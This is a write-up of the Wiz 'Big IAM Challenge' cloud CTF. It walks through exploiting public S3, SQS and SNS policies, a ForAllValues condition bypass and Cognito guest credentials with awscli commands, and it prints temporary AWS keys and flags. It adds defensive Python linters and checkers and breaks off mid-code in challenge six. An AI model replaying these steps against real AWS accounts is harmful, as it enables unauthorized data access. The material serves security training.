The Big IAM Challenge

1. Buckets of Fun

Key point: a bucket should allow neither public access nor public listing of its objects, otherwise sensitive data can leak.

The challenge gives us an IAM policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}

This IAM policy allows anyone to perform s3:GetObject (read/download) on any object in the thebigiamchallenge-storage-9979f4b bucket.
It also allows s3:ListBucket on the bucket itself,
on the condition that s3:prefix matches "files/*", i.e. only keys under files/ may be listed.

So we can work directly with the awscli:

┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/1]
└─# aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/ --no-sign-request
2023-06-05 15:13:53         37 flag1.txt
2023-06-08 15:18:24      81889 logo.png

--no-sign-request sends the request unsigned, i.e. as an anonymous caller.

# Download the file
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/1]
└─# aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt /tmp/ --no-sign-request
download: s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt to ../../../../../tmp/flag1.txt

┌──(root㉿kali)-[~]
└─# cat /tmp/flag1.txt                  
{wiz:exposed-storage-risky-as-usual}

2. Google Analytics

Key point: an SQS queue should not allow the public to receive its messages, otherwise sensitive data in transit can leak.

First, the IAM policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}

This challenge involves an SQS (Simple Queue Service) queue whose IAM policy allows the public to send and receive messages:
any principal may perform sqs:SendMessage and sqs:ReceiveMessage on the wiz-tbic-analytics-sqs-queue-ca7a1b2 queue.

SQS

SQS (Simple Queue Service) provides reliable message delivery between applications. It acts as a message relay: a message is sent from one place and picked up in another, with delivery and processing guaranteed, so that applications can communicate and cooperate more easily.

Retrieve an identity ID from Amazon Cognito using the given identity pool ID.
First we need that pool ID, which can be found in the challenge page's source code.

# Set the region with aws configure first, otherwise the commands fail
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/1]
└─# aws configure
AWS Access Key ID [None]: 
AWS Secret Access Key [None]: 
Default region name [None]: us-east-1
Default output format [None]: 
                                                                                                                                
# Get a Cognito Identity ID
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/1]
└─# aws cognito-identity get-id --identity-pool-id "us-east-1:c6f3eb2e-3cb5-404e-93bc-f0bdf7ad042e"
{
    "IdentityId": "us-east-1:157d6171-eef6-c527-06ad-914f1634e3bb"
}

Then use this identity ID to retrieve temporary AWS credentials:

┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/1]
└─# aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:157d6171-eef6-c527-06ad-914f1634e3bb" 
{
    "IdentityId": "us-east-1:157d6171-eef6-c527-06ad-914f1634e3bb",
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXJC2YRA4W",
        "SecretKey": "6V6TcB4Tq7uUTTW1IsjXCpxcsBqtCFvKXR5ZRE+V",
        "SessionToken": "<session token omitted>",
        "Expiration": "2025-04-27T03:12:24-04:00"
    }
}

Verify with sts get-caller-identity that the temporary credentials obtained from Amazon Cognito are valid.

# Export them as environment variables
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# export AWS_ACCESS_KEY_ID="ASIARK7LBOHXJC2YRA4W"
                                                                                                                                                          
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# export AWS_SECRET_ACCESS_KEY="6V6TcB4Tq7uUTTW1IsjXCpxcsBqtCFvKXR5ZRE+V"
                                                                                                                                                          
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# export AWS_SESSION_TOKEN="<session token omitted>"

# Check that the credentials are valid
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sts get-caller-identity                     
{
    "UserId": "AROARK7LBOHXAC44TZDYM:CognitoIdentityCredentials",
    "Account": "092297851374",
    "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_emptyroleUnauth_Role/CognitoIdentityCredentials"
}

Send a message with body "Hello, World" to the SQS queue.
Calling the ReceiveMessage API requires the Queue URL, whose main components are the Account ID and the queue name; the challenge policy gives us both, so we can construct the Queue URL ourselves.

┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sqs send-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --message-body "Hello, World"  --region us-east-1
{
    "MD5OfMessageBody": "82bb413746aee42f89dea2b59614f9ef",
    "MessageId": "dbb93510-8532-4c40-ad45-b77ee5c73342"
}

Receive messages from the queue:

┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2  --region us-east-1
{
    "Messages": [
        {
            "MessageId": "ad06aad3-9112-4425-877f-a78ae5fe2ff7",
            "ReceiptHandle": "AQEBC4n2tnfG7aGfJ0461AKqtYdZYOqAVdBkq2NdpRyn0fLA5ltFRGmXnXSzhxOmV56xkfLXehB+gbuixB/QJwOM2vxGcEkqJ+te/8hZNDq2on52JilPC5Wiz5GmqLBdsA2ChEqB6mZmbKCGm2+rDnlzpvQ43GzbypQrD/wWJmdtyJfMce9PE5AqfQGZzp19b+rPqqHDX56HAdvjWoAcmev+fcWzzw4q5UQtSmPJ2pPOhwJz4ZgmXoTkZrbjVXjTmmxUerQYHDa1CMgT6c2UKtahkZEiHuWz08VrYSqz/+GEeRy5eK0/UF285PzaKWg6jQ9ytG1SYL7imlEIZ/2zro30jHbaug27dxllcXMaSx9ODx2Nrd+V1RwnsYTDrgW96h+QYoRimzy1eFsrupcgODQRFrefdDFLXwgUlzB82RVOoso=",
            "MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd",
            "Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL-MM/1.4.3714\", \"IsAdmin\": true}"
        }
    ]
}

The message contains a URL; fetching it gives the flag.

┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
{wiz:you-are-at-the-front-of-the-queue}

3. Enable Push Notifications

First, the policy:

{
    "Version": "2008-10-17",
    "Id": "Statement1",
    "Statement": [
        {
            "Sid": "Statement1",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "SNS:Subscribe",
            "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
            "Condition": {
                "StringLike": {
                    "sns:Endpoint": "*@tbic.wiz.io"
                }
            }
        }
    ]
}

This policy grants Subscribe permission on the SNS topic to anyone whose endpoint ends in @tbic.wiz.io.

The topic supports the http protocol, so an endpoint of the form http://RHOST:RPORT/@tbic.wiz.io also satisfies the condition.
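The three resource policies seen so far (the S3 bucket policy of challenge 1, the SQS queue policy of challenge 2 and this SNS topic policy) share one defect: an Allow statement whose Principal is a wildcard. The following is an added example, not code from the challenge or from Wiz, of a small policy lint that reports such statements and explains why each Condition fails to restrict who may act. The policies are copied from this page; the lint rules (a Condition on s3:prefix only limits which keys are listed, and a leading-wildcard sns:Endpoint pattern without an sns:Protocol condition only pins a suffix of the endpoint string) are the assumptions it encodes.

```python
import json

# Copies of the three resource policies quoted on this page
S3_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"},
        {"Effect": "Allow", "Principal": "*", "Action": "s3:ListBucket",
         "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
         "Condition": {"StringLike": {"s3:prefix": "files/*"}}},
    ],
}
SQS_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*",
         "Action": ["sqs:SendMessage", "sqs:ReceiveMessage"],
         "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"},
    ],
}
SNS_POLICY = {
    "Version": "2008-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "SNS:Subscribe",
         "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
         "Condition": {"StringLike": {"sns:Endpoint": "*@tbic.wiz.io"}}},
    ],
}


def as_list(x):
    return x if isinstance(x, list) else [x]


def is_public_principal(principal):
    """Principal "*" and {"AWS": "*"} both mean "everyone, including anonymous"."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in as_list(principal.get("AWS", []))


def condition_keys(condition):
    return {key.lower() for pairs in condition.values() for key in pairs}


def weak_condition_reasons(condition):
    """Explain why a Condition block does not restrict WHO may act (lint rules are assumptions)."""
    if not condition:
        return ["no Condition at all"]
    reasons = []
    keys = condition_keys(condition)
    for pairs in condition.values():
        for key, patterns in pairs.items():
            for pattern in as_list(patterns):
                if key.lower() == "s3:prefix":
                    reasons.append(f"{key} limits which keys are listed, not who may list them")
                elif key.lower() == "sns:endpoint" and pattern.startswith("*") and "sns:protocol" not in keys:
                    reasons.append(f"{key} pattern {pattern!r} only pins a suffix and sns:Protocol is unconstrained")
    return reasons


def find_public_statements(policy):
    """One finding per Allow statement that grants access to a wildcard principal."""
    findings = []
    for st in policy["Statement"]:
        if st.get("Effect") != "Allow" or not is_public_principal(st.get("Principal")):
            continue
        findings.append({
            "actions": as_list(st["Action"]),
            "resources": as_list(st["Resource"]),
            "reasons": weak_condition_reasons(st.get("Condition", {})),
        })
    return findings


if __name__ == "__main__":
    for name, policy in [("s3", S3_POLICY), ("sqs", SQS_POLICY), ("sns", SNS_POLICY)]:
        print(name, json.dumps(find_public_statements(policy), indent=2))
```

Running it reports two public statements for the S3 policy, one for SQS, and one for SNS with the sns:Protocol reason; a statement whose Principal is a specific account ARN produces no finding.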

SNS

SNS (Simple Notification Service) lets developers push notifications to many kinds of endpoints, such as mobile devices, e-mail and message queues, making it easy to deliver important information and real-time updates to users. Put simply, SNS is a message broadcast system: it delivers messages to subscribers quickly and reliably so that they receive your notifications on time.

First start a listener on your own server:

# VPS
root@hcss-ecs-0abd:~# nc -lvk 1122
Listening on [0.0.0.0] (family 0, port 1122)

Then subscribe:

┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sns subscribe --protocol http --notification-endpoint https://c1trus.requestcatcher.com/test@tbic.wiz.io --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications
{
    "SubscriptionArn": "pending confirmation"
}

The subscription request then arrives, but the subscription still has to be confirmed, which requires the Token from the request.

root@hcss-ecs-0abd:~# nc -lvnp 1122
Listening on [0.0.0.0] (family 0, port 1122)
Connection from 15.221.161.116 59239 received!
POST /@tbic.wiz.io HTTP/1.1
x-amz-sns-message-type: SubscriptionConfirmation
x-amz-sns-message-id: a26e650f-67f2-44cf-95e1-a57e1ac6a721
x-amz-sns-topic-arn: arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications
Content-Type: text/plain; charset=UTF-8
Content-Length: 1623
Host: 124.71.111.64:1122
Connection: Keep-Alive
User-Agent: Amazon Simple Notification Service Agent
Accept-Encoding: gzip,deflate

{
  "Type" : "SubscriptionConfirmation",
  "MessageId" : "a26e650f-67f2-44cf-95e1-a57e1ac6a721",
  "Token" : "2336412f37fb687f5d51e6e2425a8a5874c1b184794c3b4f666ea5258862586f9732a948ea61de9757e7add9434114379693dcf9059cb97f538e19a94d994dd51c9d56abe31eb90d2e86b20ae86905eadd118d4160c33efe2f7fff848d185cc189292b3b1ae043bbd6cde25d1e5408b6cb2914e69ccaa7a73583ae36b7e13852",
  "TopicArn" : "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
  "Message" : "You have chosen to subscribe to the topic arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications.\nTo confirm the subscription, visit the SubscribeURL included in this message.",
  "SubscribeURL" : "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425a8a5874c1b184794c3b4f666ea5258862586f9732a948ea61de9757e7add9434114379693dcf9059cb97f538e19a94d994dd51c9d56abe31eb90d2e86b20ae86905eadd118d4160c33efe2f7fff848d185cc189292b3b1ae043bbd6cde25d1e5408b6cb2914e69ccaa7a73583ae36b7e13852",
  "Timestamp" : "2025-04-27T06:47:26.486Z",
  "SignatureVersion" : "1",
  "Signature" : "RRsUF5y0bE+5iKE+oRN5OwwPnDZwM6TGOr+KP4Q6NKOw/uxQB5QdSlikBVjSBUMOQwZn6TCtnVHQbKkPUkNR4vulrOMegqPGbJbiDliTDRDy7tUDlA++zhLAHAkAU4t8Lx9Cy++Kx1aH2DyHMI9qdi2VMV7n2PrGbEc6zNHjctOwbV4+xaf77dDK/yYtG6BedGI0eJgMpw0HcD+72SSgfjhL/Nj0DtckFd3izigfwzZZwqm0hMYb96Bil1xllbVgLtYnZiCd9WHP7IkwVzsl/c0Ff/oqlBylbmqSgPC4udsChjge8/B7Qo6ibPs/ywT0c5IUYOJIfmUopNAD/4IDrA==",
  "SigningCertURL" : "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-9c6465fa7f48f5cacd23014631ec1136.pem"
}

After subscribing, the subscription must be confirmed: either by visiting the SubscribeURL, or by passing the Token to the confirm-subscription API.
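The SubscriptionConfirmation captured above is exactly what an HTTP endpoint receives when someone subscribes it to a topic, and an endpoint that auto-confirms whatever it is sent will end up attached to topics it never asked for. The block below is an added example (not code from the challenge or from Wiz) of the checks a receiving endpoint should run before touching SubscribeURL: the expected TopicArn, the SigningCertURL host pattern AWS documents, and the field order SNS uses when building the string the Signature covers. The sample message is constructed to mirror the captured one, with placeholder Token and Signature values; the final RSA verification of the Signature against the certificate fetched from SigningCertURL is deliberately left to the caller so the example runs offline.

```python
import re
import urllib.parse

# Host pattern AWS documents for SigningCertURL: sns.<region>.amazonaws.com, optionally .cn
SIGNING_CERT_HOST = re.compile(r"^sns\.[a-zA-Z0-9-]{3,}\.amazonaws\.com(\.cn)?$")

# Field order SNS uses to build the string that is signed (SignatureVersion 1 = SHA1, 2 = SHA256)
SIGNED_FIELDS = {
    "SubscriptionConfirmation": ["Message", "MessageId", "SubscribeURL", "Timestamp", "Token", "TopicArn", "Type"],
    "UnsubscribeConfirmation": ["Message", "MessageId", "SubscribeURL", "Timestamp", "Token", "TopicArn", "Type"],
    "Notification": ["Message", "MessageId", "Subject", "Timestamp", "TopicArn", "Type"],
}


def string_to_sign(msg):
    """Canonical "Key\\nValue\\n" concatenation that the SNS Signature covers (Subject is optional)."""
    return "".join(f"{f}\n{msg[f]}\n" for f in SIGNED_FIELDS[msg["Type"]] if f in msg)


def signing_cert_url_is_trusted(url):
    """Only fetch the signing certificate from an SNS host over https, never from wherever the message says."""
    u = urllib.parse.urlparse(url)
    return (u.scheme == "https"
            and SIGNING_CERT_HOST.match(u.hostname or "") is not None
            and u.path.endswith(".pem"))


def subscription_decision(msg, expected_topic_arns):
    """Structural checks on an incoming SubscriptionConfirmation. Returns (ok, reason).
    ok=True means the caller may now verify msg["Signature"] over string_to_sign(msg) with the
    certificate from SigningCertURL and, only if that passes, request SubscribeURL."""
    if msg.get("Type") != "SubscriptionConfirmation":
        return False, "not a SubscriptionConfirmation"
    if msg.get("TopicArn") not in expected_topic_arns:
        return False, f"unexpected TopicArn {msg.get('TopicArn')!r}"
    if msg.get("SignatureVersion") not in ("1", "2"):
        return False, "unknown SignatureVersion"
    if not signing_cert_url_is_trusted(msg.get("SigningCertURL", "")):
        return False, "SigningCertURL is not an SNS host over https"
    missing = [f for f in SIGNED_FIELDS["SubscriptionConfirmation"] + ["Signature"] if f not in msg]
    if missing:
        return False, f"missing fields: {missing}"
    return True, "structure ok; verify Signature, then GET SubscribeURL"


# Constructed sample modelled on the SubscriptionConfirmation captured above (Token and Signature are placeholders)
TOPIC = "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications"
SAMPLE = {
    "Type": "SubscriptionConfirmation",
    "MessageId": "a26e650f-67f2-44cf-95e1-a57e1ac6a721",
    "Token": "constructed-token-0001",
    "TopicArn": TOPIC,
    "Message": f"You have chosen to subscribe to the topic {TOPIC}.\nTo confirm the subscription, visit the SubscribeURL included in this message.",
    "SubscribeURL": f"https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn={TOPIC}&Token=constructed-token-0001",
    "Timestamp": "2025-04-27T06:47:26.486Z",
    "SignatureVersion": "1",
    "Signature": "constructed-signature==",
    "SigningCertURL": "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-9c6465fa7f48f5cacd23014631ec1136.pem",
}
EXPECTED_TOPICS = {TOPIC}

if __name__ == "__main__":
    print(subscription_decision(SAMPLE, EXPECTED_TOPICS))
    print(string_to_sign(SAMPLE))
```

The TopicArn allowlist is the check that matters most for the situation on this page: a subscription policy may let anyone subscribe an endpoint, but the endpoint decides which topics it confirms.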

# Confirm the subscription
aws sns confirm-subscription --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --token 2336412f37fb687f5d51e6e2425a8a5874c1b184794c3b4f666ea5258862586f9732a948ea61de9757e7add9434114379693dcf9059cb97f538e19a94d994dd51c9d56abe31eb90d2e86b20ae86905eadd118d4160c33efe2f7fff848d185cc189292b3b1ae043bbd6cde25d1e5408b6cb2914e69ccaa7a73583ae36b7e13852


This failed for me.

So I took another route: I used a request-capturing service found online,
Request Catcher (record HTTP requests, webhooks, API calls).

# Subscription request
aws sns subscribe --protocol https --notification-endpoint https://c1trus.requestcatcher.com/test@tbic.wiz.io --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications

Then open the SubscribeURL from the captured request to confirm the subscription.
After that, the notification arrives at the endpoint.

4. Admin only?

First, the policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                },
                "ForAllValues:StringLike": {
                    "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
                }
            }
        }
    ]
}
  1. Anyone may perform s3:GetObject on objects in the thebigiamchallenge-admin-storage-abf1321 bucket.
  2. s3:ListBucket on the bucket itself is allowed, but requires the prefix files/* and a principal ARN of arn:aws:iam::133713371337:user/admin.
> aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
2023-06-07 19:15:43         42 flag-as-admin.txt
2023-06-08 19:20:01      81889 logo-admin.png

> curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt"
{wiz:principal-arn-is-not-what-you-think}
Summary

Root cause:
With ForAllValues, if the request does not contain the key at all, or the key resolves to an empty set (e.g. an empty string), the condition still evaluates to true. Do not use ForAllValues with Effect Allow, because it can be far more permissive than intended.

In other words, if the request carries no aws:PrincipalArn value, the condition returns true and the restriction is bypassed.

Fix:
Replace ForAllValues with ForAnyValue. When the key is empty, ForAnyValue evaluates to false rather than true, so an unauthorized request now gets AccessDenied.
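The difference between the two set operators is easiest to see by evaluating the challenge's Condition block against a request context. The block below is an added example, not code from the challenge or from Wiz: a minimal evaluator for StringLike with and without the ForAllValues / ForAnyValue prefixes, following the semantics described above (ForAllValues is vacuously true for an absent key; ForAnyValue is false for it). It models an unsigned request as a context with no aws:PrincipalArn at all, which is how anonymous requests look to IAM, and also tries a third variant with a plain StringLike on aws:PrincipalArn, which is the usual choice for a single-valued key; the variant names are mine.

```python
import re


def string_like(pattern, value):
    """IAM StringLike glob: '*' matches any run of characters, '?' exactly one."""
    rx = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.fullmatch(rx, value) is not None


def condition_matches(condition, request):
    """Evaluate a Condition block against a request context (key -> list of values).
    Supports StringLike with and without the ForAllValues / ForAnyValue set prefixes."""
    for operator, pairs in condition.items():
        prefix, _, base = operator.rpartition(":")   # "ForAllValues:StringLike" -> "ForAllValues", "StringLike"
        if base != "StringLike":
            raise NotImplementedError(operator)
        for key, patterns in pairs.items():
            patterns = patterns if isinstance(patterns, list) else [patterns]
            values = request.get(key, [])
            hits = [any(string_like(p, v) for p in patterns) for v in values]
            if prefix == "ForAllValues":
                ok = all(hits)                    # vacuously True when the key is absent or empty
            elif prefix == "ForAnyValue":
                ok = any(hits)                    # False when the key is absent or empty
            else:
                ok = len(hits) == 1 and hits[0]   # single-valued key must be present and match
            if not ok:
                return False
    return True


ADMIN = "arn:aws:iam::133713371337:user/admin"

# Condition from the challenge-4 bucket policy above, plus two hardened variants (names are mine)
VULNERABLE = {"StringLike": {"s3:prefix": "files/*"},
              "ForAllValues:StringLike": {"aws:PrincipalArn": ADMIN}}
FIXED_FORANYVALUE = {"StringLike": {"s3:prefix": "files/*"},
                     "ForAnyValue:StringLike": {"aws:PrincipalArn": ADMIN}}
FIXED_PLAIN = {"StringLike": {"s3:prefix": "files/*", "aws:PrincipalArn": ADMIN}}


def list_bucket_allowed(condition, principal_arn=None, prefix="files/"):
    """Does the ListBucket statement's Condition match? principal_arn=None models an
    unsigned (--no-sign-request) call, where aws:PrincipalArn is absent from the context."""
    request = {"s3:prefix": [prefix]}
    if principal_arn is not None:
        request["aws:PrincipalArn"] = [principal_arn]
    return condition_matches(condition, request)


if __name__ == "__main__":
    for name, cond in [("ForAllValues", VULNERABLE), ("ForAnyValue", FIXED_FORANYVALUE), ("plain", FIXED_PLAIN)]:
        print(f"{name:13} anonymous={list_bucket_allowed(cond)!s:5} admin={list_bucket_allowed(cond, ADMIN)}")
```

The vulnerable condition lets the anonymous listing through while still rejecting a signed request from a different ARN, which is why the bug is easy to miss in testing with real users; both hardened variants deny the anonymous request and still allow the admin ARN.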

5. Do I know you?

The policy for this challenge:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}

This IAM policy lets the application send event data and perform any operation in the Cognito Sync service. It also allows downloading and listing objects in the wiz-privatefiles bucket.

The policy shows they are using Cognito, so let's first find the identity pool ID.
As before, it is in the page source:
us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b

Then use this identity pool ID to obtain a Cognito Identity ID:

> aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
{
    "IdentityId": "us-east-1:157d6171-ee79-cab7-3487-9e6ead530042"
}

Then use that identity to obtain temporary credentials:

> aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:157d6171-ee79-cab7-3487-9e6ead530042"
{
    "IdentityId": "us-east-1:157d6171-ee9f-c168-6284-09e6aebdf217",
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXLRGKSR5G",
        "SecretKey": "pciPuW6DVSCBLusK78eSwSozf7zEqxIZkrTiSqz0",
        "SessionToken": "IQoJb3JpZ2luX2VjEMX//////////wEaCXVzLWVhc3QtMSJGMEQCIF7ApIhvlHEZ2HMgsiO8sjcvCp7f3EkD1+YMmoKu+z1XAiB+6JkwOXrho0nDoAA0Drg+F27GS8UJEn5iyPsjicf2hiqwBQheEAAaDDA5MjI5Nzg1
MTM3NCIMl6eVm1cKk5PPuatHKo0FHAfP1DvhHW1kKx0Nlm+9+41XxJrqtvHhldd8eB8ZzwYVBAZ7WiAjENIbixtLUGuz2NhHnZSaAHdGO5fWNPLXvIISzlqCXZSknfKmOKL1oZqkwUEw0JbW1ckn1mX7/kDf9GyuZ521ATOa3TnVU2OzpOBPBdtNfDl7i
snBknFQx3hkdpgJxtgRB8BiHfpIZrwbYPsftAoKwvK6w/0dtN5nXWAW5cYXqZsar2P7qfI7DLXPtGynyg8ZBxs5U0CQ+pi9I5b/gxc+07yvUo9K0PonaqH5c9NcX4gD5JTsCy0vAjYDf1uZC9FLq4qJ2c1j2KuSHNgM9m4xVHuiN7YgWCOj7V+2+5zNcT
Aq7J9o0t7BOMgp2qDzd6v8P2X9yvEZ1e/JfXKPacvbH3IbAiDBYTZVMa/Tt6yZ47Jeenmp9UCzkYLPRbwjcPSw8+Vxhw25kRe+ieZTb+KPvkluHEcxyjGLTh/tmmvnaFZHAL/SsuC31qXd7m4qU2AxR6MwcvjzihbO8jiKOWCPraAeph7rehNpdF6r2CT
oundo0QXk6CXeKeP/zJ+4tYLtYe8+xtD9Jo9jRrGMFFKI+AtrFQIOBz/aDC61NhdEokeMDnh+mJWpgg5fpnlmjbSVf7+Enxvzmc2DavsvaSWvaowOZMZe5yxTeNMFA0dcf9ZWOPP9kbAB2tohMsdyMPfJCRftUt50w8jzdtOsyGN3oiyEY7GdQzJQE//K
1dUS+HRrZPxnD5BtZ5qs4Wi97Db8D4pxDWmPC8Rwv/lCc3MTBY7Xh54kXJrSzMUPOW9PlLvY2UyT6FOJFyyI7gRw44agg0mP+yLWvq13KGKJE9QKCyX0h/fBPZ2UpxlwWL6Be0M5TFPQdM0w7ci4wAY63wITtkg+tYsvqHvxMJHAX5kBMQBCTH82hEJYC
qN37qC9QtIFSYmd67nwxWvHhdPnFC7e9D7AufORFE+O69n3M+c0S2lxFSc4mxft/g4ilx5Pd1nUAFII+kyGWvXUaU1OH2MGJzEwGsLwmKXAk8Y30otE9CCWL16lVoM2syrXvbd5KPJup51UsNcmklTwUOHTL5T8kkMRKZrKzwf/FwFmCF3iMt66BPYouZ
WmvcEKaMuAMcCozQNA8efu9/hjf8dq8rHWVzNwzFfunp3fppB0MFsFiWfwTaShcA7WeqWf3lyeWGvSuAHl24zB9wKzVFTI5jrxg/0AAUjnUz9A7m7pwgjckrEMDiNBZX+KMf+5BreFekRXBaOSjfuw/WqoSq1Z3r5r+RdQxA1JOOm7+BAzZELhXcLNrQ1
Pu8jtTup0By37Fs43sYIXG3GRT+0dL3OiTS6Iytd45QQX2SKMKIkEZpU=",
        "Expiration": 1745760893.0
    }
}

Then configure them:

export AWS_ACCESS_KEY_ID="ASIARK7LBOHXCRFQHMUU"
export AWS_SECRET_ACCESS_KEY="dM3qXdsIeUl0v2f803ufHAlzcZZJcrLfs4kMt8Oa"
export AWS_SESSION_TOKEN="<session token omitted>"

# Verify they work
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sts get-caller-identity 
{
    "UserId": "AROARK7LBOHXJKAIRDRIU:CognitoIdentityCredentials",
    "Account": "092297851374",
    "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessUnauth_Role/CognitoIdentityCredentials"
}
# This response means the credentials are valid

Now we have permission for the "s3:GetObject" and "s3:ListBucket" operations:

┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws s3 ls s3://wiz-privatefiles
2023-06-05 15:42:27       4220 cognito1.png
2023-06-05 09:28:35         37 flag1.txt

┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# cat /tmp/flag1.txt                                                             
{wiz:incognito-is-always-suspicious}

6. One final push

Policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}

This policy allows identities from the Cognito identity pool us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b to call sts:AssumeRoleWithWebIdentity, so the identity pool ID is given to us here.

The point of this challenge is to use AssumeRoleWithWebIdentity to obtain STS credentials.
Three things are needed for that:

> aws sts assume-role-with-web-identity help
--role-arn <value>
--role-session-name <value>
--web-identity-token <value>

--role-arn is given by the challenge; --role-session-name can be anything; --web-identity-token we have to obtain ourselves.
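Challenges 5 and 6 both hinge on the same thing: the identity pool hands out credentials and OpenID tokens to guest (unauthenticated) identities, and the role trust policy above conditions only on the pool ID (cognito-identity.amazonaws.com:aud), not on how the identity was authenticated. The block below is an added example, not code from the challenge or from Wiz. It decodes the claims of the OpenID token shown below for inspection only (no signature check, so nothing here trusts the token), and compares the challenge's trust policy with a hardened copy that adds the cognito-identity.amazonaws.com:amr condition AWS uses for authenticated-only roles; the hardened copy and the function names are my additions.

```python
import base64
import json

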